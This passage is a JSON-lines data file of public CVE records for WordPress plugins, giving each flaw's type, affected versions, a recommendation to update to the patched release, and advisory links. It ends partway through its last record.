{"CVE_ID":"CVE-2019-25151","slug":"cartflows","versionEndExcluding":"1.3.1","description":"The Funnel Builder plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the activate_plugin function in versions up to, and including, 1.3.0. This makes it possible for authenticated attackers to activate any plugin on the vulnerable service.","refs":"[{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-funnel-builder-by-cartflows-create-high-converting-sales-funnels-for-wordpress-privilege-escalation-1-3-0\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-funnel-builder-by-cartflows-create-high-converting-sales-funnels-for-wordpress-privilege-escalation-1-3-0\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6725319-909f-4d5c-9b34-8b6ea627b223%5D\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6725319-909f-4d5c-9b34-8b6ea627b223%5D\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/privilege-escalation-vulnerability-fixed-in-wordpress-cartflows-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/privilege-escalation-vulnerability-fixed-in-wordpress-cartflows-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0b95670-0767-4325-88d0-4ae6d7302558?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0b95670-0767-4325-88d0-4ae6d7302558?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10152","slug":"simple-certain-time-to-show-content","versionImpact":"1.2.2","versionEndExcluding":"1.3.1","description":"The Simple Certain Time to Show Content WordPress plugin before 1.3.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4d17da2-4c47-4fd1-a6bd-6692b07cf710\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4d17da2-4c47-4fd1-a6bd-6692b07cf710\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11446","slug":"chessgame-shizzle","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"The Chessgame Shizzle plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'cs_nonce' parameter in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chessgame-shizzle\\\/tags\\\/1.3.0\\\/thirdparty\\\/pgn4web\\\/cs-preview-iframe.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chessgame-shizzle\\\/tags\\\/1.3.0\\\/thirdparty\\\/pgn4web\\\/cs-preview-iframe.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194845\\\/chessgame-shizzle\\\/trunk\\\/thirdparty\\\/pgn4web\\\/cs-preview-iframe.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194845\\\/chessgame-shizzle\\\/trunk\\\/thirdparty\\\/pgn4web\\\/cs-preview-iframe.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d667f97-5072-4119-84d8-7104fd63559c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d667f97-5072-4119-84d8-7104fd63559c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11408","slug":"slotti-ajanvaraus","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"The Slotti Ajanvaraus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'slotti' shortcode in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194196%40slotti-ajanvaraus&new=3194196%40slotti-ajanvaraus&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194196%40slotti-ajanvaraus&new=3194196%40slotti-ajanvaraus&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83f7d9b9-793e-4380-b971-bc13c77a06a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83f7d9b9-793e-4380-b971-bc13c77a06a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10880","slug":"jobboardwp","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"The JobBoardWP \u2013 Job Board Listings and Submissions plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.3.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jobboardwp\\\/tags\\\/1.2.8\\\/includes\\\/admin\\\/class-emails-list-table.php#L168\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jobboardwp\\\/tags\\\/1.2.8\\\/includes\\\/admin\\\/class-emails-list-table.php#L168\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jobboardwp\\\/tags\\\/1.2.8\\\/includes\\\/admin\\\/class-emails-list-table.php#L192\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jobboardwp\\\/tags\\\/1.2.8\\\/includes\\\/admin\\\/class-emails-list-table.php#L192\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194143%40jobboardwp&new=3194143%40jobboardwp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194143%40jobboardwp&new=3194143%40jobboardwp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07b48c64-aa54-4b9b-b1ee-c0f065e2aaa4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07b48c64-aa54-4b9b-b1ee-c0f065e2aaa4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0234","slug":"sg-security","versionEndExcluding":"1.3.1","description":"The SiteGround Security WordPress plugin before 1.3.1 does not properly sanitize user input before using it in an SQL query, leading to an authenticated SQL injection issue.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/acf3e369-1290-4b3f-83bf-2209b9dd06e1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/acf3e369-1290-4b3f-83bf-2209b9dd06e1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.siteground.com\\\/viewtos\\\/responsible_disclosure_policy?scid=4&lang=en\",\"name\":\"https:\\\/\\\/www.siteground.com\\\/viewtos\\\/responsible_disclosure_policy?scid=4&lang=en\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/namah-age\\\/CVEs\\\/blob\\\/master\\\/1.md\",\"name\":\"https:\\\/\\\/github.com\\\/namah-age\\\/CVEs\\\/blob\\\/master\\\/1.md\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3551","slug":"penci-data-migrator","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"The Penci Soledad Data Migrator plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.0 via the 'data' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. This is limited to just PHP files.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4f8df3a-f247-4365-a9f6-6124065b4883?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4f8df3a-f247-4365-a9f6-6124065b4883?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/soledad-multiconcept-blogmagazine-wp-theme\\\/12945398\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/soledad-multiconcept-blogmagazine-wp-theme\\\/12945398\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1955","slug":"wp-hide-backed-notices","versionImpact":"1.3","versionEndExcluding":"1.3.1","description":"The Hide Dashboard Notifications plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'warning_notices_settings' function in all versions up to, and including, 1.3. This makes it possible for authenticated attackers, with contributor access and above, to modify the plugin's settings.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4655236-7dfe-40ae-9d0c-6eacc59af13d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4655236-7dfe-40ae-9d0c-6eacc59af13d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-hide-backed-notices\\\/tags\\\/1.3\\\/admin\\\/class-wp-hide-backed-notices-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-hide-backed-notices\\\/tags\\\/1.3\\\/admin\\\/class-wp-hide-backed-notices-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3104675%40wp-hide-backed-notices&new=3104675%40wp-hide-backed-notices&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3104675%40wp-hide-backed-notices&new=3104675%40wp-hide-backed-notices&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11871","slug":"social-media-shortcodes","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"The Social Media Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'patreon' shortcode in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-media-shortcodes\\\/tags\\\/1.3.0\\\/social_media_shortcode_plugin.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-media-shortcodes\\\/tags\\\/1.3.0\\\/social_media_shortcode_plugin.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206023%40social-media-shortcodes&new=3206023%40social-media-shortcodes&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206023%40social-media-shortcodes&new=3206023%40social-media-shortcodes&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96f63469-d05d-4c7a-8fc6-165c361a7c82?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96f63469-d05d-4c7a-8fc6-165c361a7c82?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-52182","slug":"ari-stream-quiz","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"Deserialization of Untrusted Data vulnerability in ARI Soft ARI Stream Quiz \u2013 WordPress Quizzes Builder. This issue affects ARI Stream Quiz \u2013 WordPress Quizzes Builder: from n\/a through 1.3.0.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ari-stream-quiz\\\/wordpress-ari-stream-quiz-plugin-1-3-0-php-object-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ari-stream-quiz\\\/wordpress-ari-stream-quiz-plugin-1-3-0-php-object-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0541","slug":"gs-books-showcase","versionEndExcluding":"1.3.1","description":"The GS Books Showcase WordPress plugin before 1.3.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8453e587-cc8c-491a-af09-fc4ab215134b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8453e587-cc8c-491a-af09-fc4ab215134b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4961","slug":"poptin","versionImpact":"1.3","versionEndExcluding":"1.3.1","description":"The Poptin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'poptin-form' shortcode in versions up to, and including, 1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/778af777-4c98-45cd-9704-1bdc96054aa7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/778af777-4c98-45cd-9704-1bdc96054aa7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2968210\\\/poptin#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2968210\\\/poptin#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poptin\\\/tags\\\/1.3\\\/poptin.php#L659\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/poptin\\\/tags\\\/1.3\\\/poptin.php#L659\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6851","slug":"broken-link-notifier","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"The Broken Link Notifier plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.3.0 via the ajax_blinks() function which ultimately calls the check_url_status_code() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3323864%40broken-link-notifier&new=3323864%40broken-link-notifier&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3323864%40broken-link-notifier&new=3323864%40broken-link-notifier&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f76c9f8-c57a-4875-b581-f67c9c60021c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f76c9f8-c57a-4875-b581-f67c9c60021c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6838","slug":"broken-link-notifier","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"The Broken Link Notifier plugin for WordPress is vulnerable to CSV Injection in all versions up to, and including, 1.3.0 via broken links that are later exported. This makes it possible for authenticated attackers, with Contributor-level access and above, to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3323864%40broken-link-notifier&new=3323864%40broken-link-notifier&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3323864%40broken-link-notifier&new=3323864%40broken-link-notifier&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd96beee-afcb-4439-ad9b-f24e8afeac3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd96beee-afcb-4439-ad9b-f24e8afeac3c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12239","slug":"powerpack-addon-for-beaver-builder","versionImpact":"1.3.0.5","versionEndExcluding":"1.3.1","description":"The PowerPack Lite for Beaver Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the navigate parameter in all versions up to, and including, 1.3.0.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrative user into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpack-addon-for-beaver-builder\\\/trunk\\\/includes\\\/admin-settings-templates.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpack-addon-for-beaver-builder\\\/trunk\\\/includes\\\/admin-settings-templates.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5138ed4c-3e9c-45da-917e-e8d8396a62f1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5138ed4c-3e9c-45da-917e-e8d8396a62f1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6253","slug":"uicore-elements","versionImpact":"1.3.0","versionEndExcluding":"1.3.1","description":"The UiCore Elements \u2013 Free Elementor widgets and templates plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.3.0 via the prepare_template() function due to a missing capability check and insufficient controls on the filename specified. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 1.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3314574\\\/uicore-elements#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3314574\\\/uicore-elements#file3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7cd6e44-bd78-4eb8-bab8-09e2af583222?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7cd6e44-bd78-4eb8-bab8-09e2af583222?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4763","slug":" icon-widget","versionEndExcluding":"1.3.0","description":"The Icon Widget WordPress plugin before 1.3.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f79a87f-c994-4a1e-b455-39d7d3c5c1b5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f79a87f-c994-4a1e-b455-39d7d3c5c1b5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3604","slug":"contact-form-entries","versionImpact":"1.2.9","versionEndExcluding":"1.3.0","description":"The Contact Form Entries WordPress plugin before 1.3.0 does not validate data when it is output in a CSV file, which could lead to CSV injection.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/300ebfcd-c500-464e-b919-acfeb72593de\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/300ebfcd-c500-464e-b919-acfeb72593de\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12861","slug":"w2s-migrate-woo-to-shopify","versionImpact":"1.2.1","versionEndExcluding":"1.3.0","description":"The W2S \u2013 Migrate WooCommerce to Shopify plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.2.1 via the 'viw2s_view_log' AJAX action. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227799%40w2s-migrate-woo-to-shopify&new=3227799%40w2s-migrate-woo-to-shopify&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227799%40w2s-migrate-woo-to-shopify&new=3227799%40w2s-migrate-woo-to-shopify&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a8eeae9-572c-420a-be7d-a240c54e96ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a8eeae9-572c-420a-be7d-a240c54e96ae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9889","slug":"elementinvader-addons-for-elementor","versionImpact":"1.2.9","versionEndExcluding":"1.3.0","description":"The ElementInvader Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.9 via the Page Loader widget. This makes it possible for authenticated attackers, with contributor-level access and above, to view private\/draft\/password protected posts, pages, and Elementor templates that they should not have access to.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bd04f78-0b9c-4985-b450-007bb5cc9e26?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bd04f78-0b9c-4985-b450-007bb5cc9e26?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3171339%40elementinvader-addons-for-elementor&new=3171339%40elementinvader-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3171339%40elementinvader-addons-for-elementor&new=3171339%40elementinvader-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5221","slug":"qi-blocks","versionImpact":"1.2.9","versionEndExcluding":"1.3.0","description":"The Qi Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's file uploader in all versions up to, and including, 1.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdf00861-e31e-485c-a562-12dba56af1c7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdf00861-e31e-485c-a562-12dba56af1c7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3097241%40qi-blocks%2Ftrunk&old=3094374%40qi-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3097241%40qi-blocks%2Ftrunk&old=3094374%40qi-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13387","slug":"wp-responsive-tabs","versionImpact":"1.2.9","versionEndExcluding":"1.3.0","description":"The WP Responsive Tabs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wprtabs' shortcode in all versions up to, and including, 1.2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3222481%40wp-responsive-tabs&new=3222481%40wp-responsive-tabs&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3222481%40wp-responsive-tabs&new=3222481%40wp-responsive-tabs&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39e58875-2f6e-453e-b33f-3d7a2a62b7b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39e58875-2f6e-453e-b33f-3d7a2a62b7b6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2018-25095","slug":"duplicator","versionEndExcluding":"1.3.0","description":"The Duplicator WordPress plugin before 1.3.0 does not properly escape values when its installer script replaces values in WordPress configuration files. If this installer script is left on the site after use, it could be used to run arbitrary code on the server.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16cc47aa-cb31-4114-b014-7ac5fbc1d3ee\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16cc47aa-cb31-4114-b014-7ac5fbc1d3ee\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6264","slug":"post-meta-data-manager","versionImpact":"1.2.3","versionEndExcluding":"1.3.0","description":"The Post Meta Data Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018$meta_key\u2019 parameter in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dd6828b-6235-4284-bce6-be23b79ac70e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9dd6828b-6235-4284-bce6-be23b79ac70e?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party 